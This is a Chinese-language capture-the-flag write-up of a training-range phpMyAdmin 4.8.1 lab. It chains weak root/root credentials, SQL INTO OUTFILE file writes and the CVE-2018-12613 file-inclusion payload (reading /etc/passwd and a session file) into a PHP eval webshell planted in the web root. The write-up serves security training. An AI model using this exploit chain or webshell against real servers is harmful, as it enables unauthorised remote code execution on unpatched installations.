墨者学院-phpMyAdmin后台文件包含分析溯源

首先拿到题目到点击访问

访问后使用弱口令进行登陆，如登陆失败开启隐私模式或者更换浏览器

账户密码：root   root

点击sql模块 对sql语句进行一个查询

首先查询sql写一句话的权限

我们可以看到他的值为空

secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。

show global VARIABLES like '%secure%' 

继续查看mysql安装的绝对路径，可以发现他是安装在/var/lib/mysql/

show VARIABLES like 'datadir' 

接下来确认一下mysql权限，可以看到这里是最高权限root

SELECT USER();

 权限和绝对路径都有了之后可以直接写入一句话了，先试一下phpinfo

select '<?php phpinfo(); ?>' into outfile '/var/lib/mysql/test.php';

当写进去之后访问失败，想了半天才发现这是mysql的路径，不是网站的绝对路径

继续想办法搞到网站的绝对路径  根据题目可知是通过文件包含的方式写一个phpinfo，通过泄漏的绝对路径来shell，思路有了，直接干

首先确定下数据库版本，该版本为4.8.1。在根据数据库版本历史漏洞查询关于文件包含的编号是CVE-2018-12613

 直接利用payload进行包含就行了

http://124.70.71.251:40917/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

先写入一个phpinfo进数据库

select '<?php phpinfo();?>';

再通过文件包含去调用phpinfo

首先获取session的值，在构造参数去访问phpinfo，获取绝对路径

http://124.70.71.251:45548/index.phpindex.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_[value]

有了绝对路径之后就可以写入webshell了,写入之后直接访问1.php

select "<?php @eval($_POST['cmd']) ?>" into outfile "/var/www/html/1.php";

 使用管理工具登陆上去后到根下面直接去找key.txt  或者 find / -name key.txt